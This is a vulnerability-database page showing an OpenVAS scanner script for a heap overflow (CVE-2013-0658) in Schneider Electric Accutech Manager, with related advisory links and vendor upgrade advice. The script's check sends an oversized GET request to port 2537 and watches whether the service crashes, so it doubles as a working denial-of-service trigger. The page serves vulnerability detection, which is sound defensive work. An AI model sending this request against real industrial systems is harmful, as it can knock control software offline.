Lucene search
+L

Schneider Electric Accutech Manager Buffer Overflow Vulnerability

🗓️ 11 Feb 2013 00:00:00Reported by Copyright (C) 2013 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 29 Views

Schneider Electric Accutech Manager Buffer Overflow Vulnerability, allows remote attackers to execute arbitrary code or cause denial-of-servic

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2013-0658
10 Feb 201300:00
circl
checkpoint_advisories
Check Point Advisories
Schneider Electric Accutech Manager HTTP Request Processing Buffer Overflow (CVE-2013-0658)
30 Jun 201300:00
checkpoint_advisories
cve
CVE
CVE-2013-0658
15 Feb 201311:00
cve
cvelist
Cvelist
CVE-2013-0658
15 Feb 201311:00
cvelist
exploitdb
Exploit DB
Schneider Electric Accutech Manager - Heap Overflow (PoC)
10 Feb 201300:00
exploitdb
ics
ICS
Schneider Electric Accutech Manager Heap Overflow
16 Nov 201307:00
ics
nvd
NVD
CVE-2013-0658
15 Feb 201312:09
nvd
prion
Prion
Heap overflow
15 Feb 201312:09
prion
redhatcve
RedhatCVE
CVE-2013-0658
22 May 202505:22
redhatcve
nessus
Tenable Nessus
Schneider Electric Accutech Manager RFManagerService Heap Overflow
18 Mar 201300:00
nessus
Rows per page
# SPDX-FileCopyrightText: 2013 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.803170");
  script_version("2023-07-21T05:05:22+0000");
  script_cve_id("CVE-2013-0658");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_tag(name:"last_modification", value:"2023-07-21 05:05:22 +0000 (Fri, 21 Jul 2023)");
  script_tag(name:"creation_date", value:"2013-02-11 19:51:40 +0530 (Mon, 11 Feb 2013)");
  script_name("Schneider Electric Accutech Manager Buffer Overflow Vulnerability");

  script_xref(name:"URL", value:"http://secunia.com/advisories/52034");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/57651");
  script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/24474");
  script_xref(name:"URL", value:"http://www.securelist.com/en/advisories/52034");

  script_category(ACT_DENIAL);
  script_tag(name:"qod_type", value:"remote_analysis");
  script_copyright("Copyright (C) 2013 Greenbone AG");
  script_family("Buffer overflow");
  script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
  script_require_ports(2537);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to execute
  arbitrary code or cause the application to crash, creating a denial-of-service condition.");

  script_tag(name:"affected", value:"Schneider Electric Accutech Manager version 2.00.1 and prior.");

  script_tag(name:"insight", value:"The flaw is caused by an unspecified error, which can be exploited
  to cause a heap-based buffer overflow by sending a specially crafted GET
  request with more than 260 bytes to TCP port 2537.");

  script_tag(name:"solution", value:"Upgrade to Schneider Electric Accutech Manager 2.00.4 or later.");

  script_tag(name:"solution_type", value:"VendorFix");

  script_tag(name:"summary", value:"Schneider Electric Accutech Manager is prone to a buffer overflow vulnerability.");

  exit(0);
}

include("http_func.inc");

port = 2537;
if(!get_port_state(port))
  exit(0);

# nb: Application specific response is not available
banner = http_get_remote_headers(port:port);
if(!banner)
  exit(0);

if(http_is_dead(port:port))
  exit(0);

req = http_get(item:string("/", crap(500)), port:port);
res = http_send_recv(port:port, data:req);
sleep(1);

if(http_is_dead(port:port)) {
  security_message(port:port);
  exit(0);
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation